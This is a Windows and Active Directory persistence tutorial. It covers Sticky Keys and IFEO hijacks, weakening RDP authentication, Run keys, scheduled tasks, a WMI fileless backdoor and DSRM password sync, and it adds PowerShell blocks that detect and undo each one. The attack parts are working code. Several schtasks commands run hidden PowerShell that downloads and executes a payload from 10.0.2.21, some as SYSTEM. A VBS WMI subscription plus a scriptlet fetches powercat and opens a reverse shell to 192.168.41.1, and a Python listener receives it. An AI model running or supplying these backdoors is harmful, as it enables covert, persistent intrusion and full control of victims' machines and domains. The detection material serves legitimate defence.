Persistence (权限维持)

1 Operating system backdoors

1.1 Sticky Keys backdoor

1.1.1 Traditional method

Under C:\Windows\System32, replace sethc.exe (the Sticky Keys program) with a copy of cmd.exe.

On Windows Vista and later, trying to modify sethc.exe prompts that TrustedInstaller permission is required. TrustedInstaller (NT SERVICE\TrustedInstaller) is the Windows Modules Installer service account; it is the owner of the protected system files and the only principal with Full Control over them, while Administrators and even SYSTEM get only read and execute by ACL.

Windows principals are usually ranked from low to high as user, administrator, SYSTEM. TrustedInstaller is not a higher privilege level than SYSTEM; it is simply the owner of the protected files, so no one else, administrator included, can write to them directly. The benefit is that malware running as administrator cannot silently replace system files. The cost is that an administrator cannot modify sethc.exe in place either: you must first take ownership of the file and assign it to your current administrator user.

Before taking ownership, the permission edit controls for the file are greyed out and cannot be changed. Once you own the file you can edit its ACL and grant yourself Full Control.

At this point you can rename or delete sethc.exe, then copy cmd.exe in its place. Afterwards, at the lock screen (no password needed), pressing Shift five times launches the "Sticky Keys" program, which is now cmd.exe running as SYSTEM, and from there you can add users and perform other operations.
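The traditional swap done from an elevated PowerShell prompt, together with the check that reveals it, as an added example that is not part of the original post. It assumes an Administrator session on the target; the backup file name is a placeholder.

```powershell
# Added example: replace sethc.exe with cmd.exe the "traditional" way and then
# detect the swap. Run from an elevated PowerShell prompt on the target.
$sethc = "$env:SystemRoot\System32\sethc.exe"
$cmd   = "$env:SystemRoot\System32\cmd.exe"

# 1. Take ownership away from TrustedInstaller and grant Administrators Full Control
takeown /f $sethc | Out-Null
icacls  $sethc /grant Administrators:F | Out-Null

# 2. Keep the original (placeholder backup name) and drop cmd.exe in its place
Copy-Item $sethc "$env:SystemRoot\System32\sethc.exe.bak"
Copy-Item $cmd   $sethc -Force

# Detection: a swapped sethc.exe hashes identically to cmd.exe and is no longer
# owned by TrustedInstaller. Note that the Authenticode signature still reads
# Valid, because cmd.exe is itself Microsoft-signed, so the hash is the useful check.
function Test-SethcReplaced {
    $h1    = (Get-FileHash $sethc -Algorithm SHA256).Hash
    $h2    = (Get-FileHash $cmd   -Algorithm SHA256).Hash
    $owner = (Get-Acl $sethc).Owner
    [pscustomobject]@{
        SameHashAsCmd = ($h1 -eq $h2)
        Owner         = $owner
        OwnerChanged  = ($owner -ne 'NT SERVICE\TrustedInstaller')
        Signature     = (Get-AuthenticodeSignature $sethc).Status
    }
}

Test-SethcReplaced

# Restore: Copy-Item "$env:SystemRoot\System32\sethc.exe.bak" $sethc -Force
# (or run "sfc /scannow" to have Windows Resource Protection put the original back).
```

The same check applies to the other accessibility binaries the logon screen can start (utilman.exe, osk.exe, narrator.exe, magnify.exe), which are swapped the same way.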

1.1.2 New method

The new method sets up the Sticky Keys backdoor entirely through the registry: an Image File Execution Options (IFEO) "debugger" hijack of sethc.exe, plus two registry changes that open up the target's Remote Desktop so the backdoor can be reached remotely.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Command explanation: reg add writes a value to the registry; the first argument is the key path. HKLM is short for HKEY_LOCAL_MACHINE. Subkeys under Image File Execution Options configure image hijacking, and the subkey name is the image being hijacked, here the Sticky Keys program sethc.exe. /v gives the value name, which must be Debugger; /t gives the type, the REG_SZ string type; /d gives the data, the program that maliciously replaces it, our cmd.exe. Whenever Windows is asked to create a process for sethc.exe it instead starts the Debugger program with the original command line appended, so cmd.exe comes up in its place.

Once the image hijack is in place the effect is the same as replacing sethc.exe in the old method, without touching the file on disk. For convenience we also open the target's Remote Desktop through the registry, which needs two values changed. Note that these two values only remove the pre-logon checks; Remote Desktop itself must already be enabled (fDenyTSConnections set to 0 under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server) and TCP 3389 must be reachable.

1.1.2.1 Disable the RDP user authentication option

The first change turns off the user authentication option of the Remote Desktop connection, that is, sets the value to 0. Run the following on the command line:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0

The UserAuthentication value controls Network Level Authentication (NLA):

0 means no user authentication is required before the remote desktop session is created; 1, the default, means the client must authenticate before a session is created. To see the difference, here is the behaviour when UserAuthentication is 1:

With UserAuthentication at 1, authentication happens before the remote desktop is shown: after starting the remote connection you are asked for a username and password, and if you enter a username but no password and click Connect, the client immediately reports an authentication error. With UserAuthentication at 0 no authentication is performed before the connection, so entering a username without a password takes you straight to the lock screen of the remote desktop. Setting it to 0 therefore lets us reach the target's lock screen and bring up cmd without any credentials.

Note: The default is 0 on Windows Server 2012

1.1.2.2 Change the RDP security layer setting

The second change sets the security layer of the Remote Desktop connection to 0. Run the following on the command line:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0

SecurityLayer selects how the connection is secured: 0 is the legacy RDP security layer (RDP's own encryption, no server certificate and no NLA), which in practice means no pre-session verification; 1, the default, is negotiate, where the two ends agree on TLS if the client supports it and fall back to RDP otherwise; 2 forces TLS (SSL). The difference between 0 and 1 as seen from the client:

With UserAuthentication already at 0, when SecurityLayer is 1 clicking Connect and entering a username still shows a credential prompt before the target desktop appears. When SecurityLayer is changed to 0, clicking Connect goes straight to the user's lock screen, skipping the credential step entirely. So we set it to 0 and jump directly to the lock screen to trigger cmd.

Note: The default is 1 on Windows Server 2012
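The registry state described in 1.1.2 (IFEO Debugger on the accessibility binaries, UserAuthentication, SecurityLayer, and whether RDP is enabled at all) checked in one place, as an added example that is not from the original post. It assumes an elevated PowerShell session on the machine being examined; the list of accessibility binaries is the usual set the logon screen can launch before authentication.

```powershell
# Added example: audit the registry for the IFEO-based Sticky Keys backdoor and the
# two RDP settings the post changes. Run elevated on the target.
$accessibility = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                 'magnify.exe', 'displayswitch.exe', 'atbroker.exe'
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$ts   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdp  = "$ts\WinStations\RDP-Tcp"

function Get-IfeoHijack {
    # A Debugger value under IFEO\<image> makes Windows start that program instead
    # of the image; on an accessibility binary that is the backdoor.
    foreach ($exe in $accessibility) {
        $key = Join-Path $ifeo $exe
        if (-not (Test-Path $key)) { continue }
        $dbg = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            [pscustomobject]@{ Image = $exe; Debugger = $dbg }
        }
    }
}

function Get-RdpExposure {
    $t = Get-ItemProperty -Path $ts  -ErrorAction SilentlyContinue
    $p = Get-ItemProperty -Path $rdp -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RdpEnabled         = ($t.fDenyTSConnections -eq 0)
        UserAuthentication = $p.UserAuthentication    # 1 = NLA required, 0 = off
        SecurityLayer      = $p.SecurityLayer         # 0 = RDP, 1 = negotiate, 2 = TLS
        NlaDisabled        = ($p.UserAuthentication -eq 0)
        LegacyRdpLayer     = ($p.SecurityLayer -eq 0)
    }
}

$hijacks = Get-IfeoHijack
if ($hijacks) { $hijacks | Format-Table -AutoSize }
else          { Write-Output 'No IFEO Debugger set on accessibility binaries.' }
Get-RdpExposure | Format-List

# Undo the exact changes made in 1.1.2 (uncomment to apply):
# Remove-ItemProperty -Path (Join-Path $ifeo 'sethc.exe') -Name Debugger
# Set-ItemProperty -Path $rdp -Name UserAuthentication -Value 1
# Set-ItemProperty -Path $rdp -Name SecurityLayer      -Value 1
```

A hit in Get-IfeoHijack is almost always malicious: legitimate IFEO Debugger entries point at a real debugger, never at cmd.exe or a shell. NlaDisabled and LegacyRdpLayer both true is the fingerprint of the RDP side of this backdoor.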

1.1.3 Test results

In testing, on Windows 10 the msf session was dropped as soon as the RDP connection was disconnected; on Windows Server 2008 it worked.

1.2 Registry backdoor

Run key: every value under this key is a startup item, a program launched each time the user logs on. The per-user location is shown below; the HKEY_LOCAL_MACHINE key of the same path applies to every user of the machine and needs administrator rights to write.

Location:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Command under msf:


use exploit/windows/local/persistence

1.3 Scheduled task backdoor

schtasks sub-commands:

/Create   Creates a new scheduled task.
/Delete   Deletes a scheduled task.
/Query    Displays all scheduled tasks.
/Change   Changes the properties of a scheduled task.
/Run      Runs a scheduled task on demand.
/End      Stops a currently running scheduled task.
/ShowSid  Shows the security identifier corresponding to a scheduled task name.

# schtasks commands

# run every night at 03:30
schtasks /create /tn "TimedTask1" /tr C:\Users\Administrator\Desktop\TimedTask\Run.bat /sc DAILY /st 03:30

# query the created task (verbose output)
schtasks /query /tn TimedTask1 /v

# run the created task immediately
schtasks /run /tn TimedTask1

# delete the task
schtasks /delete /tn TimedTask1

#(X64) - On System Start
schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg''))'" /sc onstart /ru System

#(X64) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg''))'" /sc onidle /i 30

#(X86) - On User Login
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg''))'" /sc onlogon /ru System

#(X86) - On System Start
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg''))'" /sc onstart /ru System

#(X86) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg''))'" /sc onidle /i 30

Notes: the /tr program string is wrapped in double quotes for cmd, and inside it the PowerShell -c argument is a single-quoted string, so the URL's own quotes are doubled (''...''). On 64-bit Windows, SysWOW64 holds the 32-bit PowerShell and System32 the native 64-bit one; pick the host whose bitness matches the staged payload. /ru System makes the task run as SYSTEM and requires an administrator to create it; the onidle tasks run as the creating user. /i 30 is the idle time in minutes before the task fires.
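Finding tasks like the ones above on a host, as an added example that is not from the original post or from the pentestlab write-up. It assumes Windows PowerShell 4 or later (for the ScheduledTasks module) and an elevated session so tasks running as SYSTEM are visible; the indicator list is an assumption based on the download cradle used above.

```powershell
# Added example: flag scheduled tasks whose action looks like a PowerShell download
# cradle (hidden window, execution-policy bypass, IEX of a downloaded string).
$patterns = 'IEX', 'downloadstring', 'DownloadFile', '-ep bypass', '-ExecutionPolicy Bypass',
            '-nop', '-enc', '-WindowStyle hidden', 'FromBase64String', 'http://'

function Find-SuspiciousScheduledTask {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only "Exec" actions carry a command line; COM-handler actions have no Execute
            if (-not $action.Execute) { continue }
            $cmd  = "$($action.Execute) $($action.Arguments)"
            $hits = $patterns | Where-Object { $cmd -match [regex]::Escape($_) }
            if (-not $hits) { continue }
            $info = $task | Get-ScheduledTaskInfo
            [pscustomobject]@{
                TaskName    = $task.TaskName
                Path        = $task.TaskPath
                RunAs       = $task.Principal.UserId
                # trigger class names look like MSFT_TaskBootTrigger / MSFT_TaskLogonTrigger / MSFT_TaskIdleTrigger
                Triggers    = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ','
                LastRun     = $info.LastRunTime
                Indicators  = $hits -join ';'
                CommandLine = $cmd
            }
        }
    }
}

Find-SuspiciousScheduledTask | Format-List

# Removal has the same effect as "schtasks /delete /tn PentestLab /f":
# Unregister-ScheduledTask -TaskName PentestLab -Confirm:$false
```

Two further places worth checking: the task XML files under C:\Windows\System32\Tasks, which survive even when the task is hidden from the GUI, and Security event 4698 (a scheduled task was created), which is logged when "Audit Other Object Access Events" is enabled.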

1.4 WMI fileless backdoor

evil3.vbs - malicious VBS script. It creates a WMI event filter that fires when an account logs on successfully (Security event 4624), an ActiveScript event consumer that fetches and executes the remote scriptlet pnc.js when the filter fires, and a binding between the two. The subscription lives in the WMI repository, and the script deletes itself at the end, so nothing is left on disk.

nslink = "winmgmts:\\.\root\subscription:"
qstr = "select * from __InstanceCreationEvent within 5 "           ' poll for new instances every 5 seconds
qstr = qstr & "where targetinstance isa 'win32_NTLogEvent' and "   ' new Win32_NTLogEvent instances (event log records)
qstr = qstr & "targetinstance.EventCode='4624' "                   ' ... with event ID 4624 (successful logon)
set evtflt = getobject(nslink & "__EventFilter").spawninstance_    ' create an event filter
evtflt.name = "filtP1"                                             ' filter name
evtflt.EventNameSpace = "root\cimv2"                               ' namespace the query runs against
evtflt.query = qstr                                                ' query text
evtflt.querylanguage = "wql"                                       ' query language (only WQL is supported)
set fltpath = evtflt.put_                                          ' register the filter; returns its object path
set asec = getobject(nslink & "ActiveScriptEventConsumer").spawninstance_   ' create an ActiveScript event consumer
asec.name = "consP1"                                               ' consumer name
asec.scriptingengine = "JScript"                                   ' scripting language of ScriptText
asec.ScriptText = "GetObject(""script:http://192.168.41.1:8080/pnc.js"")"   ' JScript that loads and runs the remote scriptlet
set asecpath = asec.put_                                           ' register the consumer; returns its object path
set fcbnd = getobject(nslink & "__FilterToConsumerBinding").spawninstance_  ' create the filter-to-consumer binding
fcbnd.filter = fltpath.path                                        ' which filter
fcbnd.consumer = asecpath.path                                     ' which consumer
fcbnd.put_                                                         ' commit the binding
dim fso
set fso = CreateObject("Scripting.FileSystemObject")
evilname = left(wscript.scriptfullname, instrrev(wscript.scriptfullname, "\"))
evilname = evilname & fso.GetFile(wscript.scriptfullname).name
fso.DeleteFile(evilname)                                           ' the vbs deletes itself

pnc.js - scriptlet hosted on the attacker's server and loaded by the consumer through the script: moniker (it is a COM scriptlet, XML wrapping JScript, despite the .js name). It downloads powercat.ps1 and uses it to return a shell.

<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.41.1:8080/powercat-master/powercat.ps1');powercat -c 192.168.41.1 -p 6999 -e cmd");
]]>
</script>
</component>
</package>

shell_server.py - attacker-side listener that receives the shell (one session at a time; type commands at the prompt that cmd.exe sends back).

import socket
import re

# A cmd.exe prompt looks like "C:\Users\x>"; its appearance marks the end of one
# command's output, so the listener stops reading and asks for the next command.
pattern = re.compile(r'[A-Z]:\\.*?>')


def recv_end(the_socket):
    """Read from the socket until a cmd prompt is seen, then return all text read."""
    total_data = []
    while True:
        data = the_socket.recv(1024)
        if not data:
            raise ConnectionAbortedError
        data = str(data, encoding='gbk')   # cmd.exe on a Chinese locale emits GBK
        total_data.append(data)
        if pattern.search(data):
            break
        if len(total_data) > 1:
            # the prompt may be split across two recv() calls
            last_pair = total_data[-2] + total_data[-1]
            if pattern.search(last_pair):
                break
    return ''.join(total_data)


# Create the server
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 6999
server.bind(('192.168.41.1', port))   # the address and port powercat connects back to
server.listen(5)                      # backlog of up to five queued connections

while True:
    print('------------Listening on {}------------'.format(port))
    conn, addr = server.accept()      # blocks until a client connects; returns the socket and the peer address
    print(conn)
    while True:
        try:
            se = input(recv_end(conn))   # show output up to the prompt, then read the next command
            if not se:
                se = '\r\n'
            conn.send(bytes(se, encoding='utf-8'))   # send the command to the remote cmd.exe
        except Exception as e:
            print('\n' + addr[0] + ':' + str(addr[1]) + ' Close')
            break
    conn.close()   # close this session and go back to listening

powercat.ps1 - powershell version netcat. (https://github.com/besimorhino/powercat)

clean.ps1 - removes the filter, consumer and binding created by evil3.vbs. Note that evil3.vbs registers an ActiveScriptEventConsumer, so that is the consumer class to remove (a CommandLineEventConsumer query would return nothing).

#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='filtP1'" | Remove-WmiObject -Verbose
#Consumer
Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer -Filter "Name='consP1'" | Remove-WmiObject -Verbose
#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%filtP1%'" | Remove-WmiObject -Verbose
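clean.ps1 only knows the names filtP1 and consP1. The check a responder wants is an enumeration of every permanent WMI subscription on the host with its query and payload, so that an unknown one stands out; the following is an added example, not part of the original post. It assumes an elevated Windows PowerShell session (root\subscription is readable only by administrators) and uses Get-WmiObject because, unlike Get-CimInstance, it returns the binding's Filter and Consumer references as plain path strings.

```powershell
# Added example: list every WMI filter -> consumer binding with the event query
# that triggers it and the payload it runs. Run elevated in Windows PowerShell.
function Get-WmiPersistence {
    $ns = 'root\subscription'
    $filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
    # __EventConsumer is the base class, so this returns every consumer type
    # (ActiveScriptEventConsumer, CommandLineEventConsumer, ...)
    $consumers = Get-WmiObject -Namespace $ns -Class __EventConsumer
    $bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding

    foreach ($b in $bindings) {
        # Filter/Consumer are reference strings like  __EventFilter.Name="filtP1"
        $fName = ($b.Filter   -split '"')[1]
        $cName = ($b.Consumer -split '"')[1]
        $f = $filters   | Where-Object Name -eq $fName
        $c = $consumers | Where-Object Name -eq $cName
        # ActiveScriptEventConsumer carries ScriptText (or ScriptFileName);
        # CommandLineEventConsumer carries CommandLineTemplate
        $payload = if ($c.ScriptText) { $c.ScriptText }
                   elseif ($c.ScriptFileName) { $c.ScriptFileName }
                   else { $c.CommandLineTemplate }
        [pscustomobject]@{
            Filter       = $fName
            Namespace    = $f.EventNamespace
            Query        = $f.Query
            Consumer     = $cName
            ConsumerType = $c.__CLASS
            Payload      = $payload
        }
    }
}

Get-WmiPersistence | Format-List

# Remove one whole subscription by filter name, binding first so nothing dangles:
# Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding |
#     Where-Object { $_.Filter -match 'filtP1' } | Remove-WmiObject
# Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='filtP1'" | Remove-WmiObject
# Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer -Filter "Name='consP1'" | Remove-WmiObject
```

On a clean workstation the list is normally empty; on servers the Microsoft SCM and BVTFilter/BVTConsumer entries are the usual legitimate ones. Any ActiveScriptEventConsumer whose ScriptText fetches a script: moniker or an http URL, as above, is a backdoor. Get-WmiObject is removed in PowerShell 7; there, use Get-CimInstance and read the key from the Filter and Consumer objects instead of splitting a string.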

2 Domain controller backdoors

2.1 DSRM backdoor

DSRM (Directory Services Restore Mode) is a safe-mode boot option for domain controllers in a Windows domain. Every domain controller keeps a local administrator account for it (the DSRM account). DSRM exists so that an administrator can restore, repair or rebuild the Active Directory database when the domain environment fails or crashes and get the domain running again. The DSRM password is set when the DC is promoted, early in the life of the domain, and is rarely reset afterwards; the basic way to change it is the ntdsutil command line on the DC.

In a penetration test the DSRM account can be used to persist in the domain: ntdsutil can synchronise the DSRM password with the password of a chosen domain account, which then also works as the DC's local administrator. If the domain controller runs Windows Server 2008, hotfix KB961320 must be installed for the "sync from domain account" option to be available.
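The ntdsutil sequence that performs the sync described above, with the checks a defender runs on the DC to catch it, as an added example that is not part of the original post. It assumes a Domain Admin session on the domain controller; svc_backup is a placeholder account name.

```powershell
# Added example: sync the DSRM password from a domain account, then the detection side.
# Run on the domain controller as a Domain Admin.

# Set the DSRM (local DC administrator) password to that of an existing domain account.
# "svc_backup" is a placeholder. On Windows Server 2008 this option needs hotfix KB961320.
ntdsutil "set dsrm password" "sync from domain account svc_backup" q q

# Detection 1: every DSRM password set or sync logs Security event 4794 on the DC.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4794 } -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } }

# Detection 2: the DSRM account normally cannot log on while the DC is running; the
# DsrmAdminLogonBehavior value under Lsa relaxes that (2 allows logon at any time),
# so its presence on a DC is the usual companion change to the password sync.
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue
```

A DSRM password change is rare in a healthy domain, so alerting on event 4794 outside a planned DC maintenance window is a low-noise detection.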
